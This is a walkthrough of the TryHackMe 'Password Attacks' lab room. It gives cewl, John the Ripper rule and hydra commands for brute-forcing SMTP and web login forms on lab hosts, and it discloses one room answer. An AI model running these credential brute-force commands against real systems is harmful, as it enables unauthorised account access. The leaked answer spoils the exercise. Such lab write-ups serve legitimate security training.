Password Attacks
Room Link: https://tryhackme.com/room/passwordattacks
Deploy the VM
Creating a wordlist from this site as recommend in the room.
Kali
cewl -m 8 -w clinic.lst https://clinic.thmredteam.com/
Offline Attacks
In this question, you need to generate a rule-based dictionary from the wordlist clinic.lst in the previous task. email: pittman@clinic.thmredteam.com against 10.10.131.68:25 (SMTP).
What is the password? Note that the password format is as follows: [symbol][dictionary word][0-9][0-9].
john.conf
[List.Rules:THM-Password-Attacks]
Az"[0-9][0-9]" ^[!@#$]
Kali
john --wordlist=clinic.lst --rules=THM-Password-Attacks --stdout > dict.lst
hydra -l pittman@clinic.thmredteam.com -P dict.lst smtp://$VICTIM:25 -v
Answer is !multidisciplinary00
Perform a brute-forcing attack against the phillips account for the login page at http://10.10.130.199/login-get using hydra? What is the flag?


Kali
hydra -l phillips -P ../dict.lst 10.10.130.199 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f

Perform a rule-based password attack to gain access to the burgess account. Find the flag at the following website: http://10.10.130.199/login-post/. What is the flag?
Note: use the clinic.lst dictionary in generating and expanding the wordlist!
Kali
john --wordlist=clinic.lst --rules=Single-Extra --stdout > dict2.lst
./hydra -l burgess -P dict2.lst 10.10.130.199 http-post-form "/login-post/index.php:username=^USER^&password=^PASS^:S=logout.php" -f

Last updated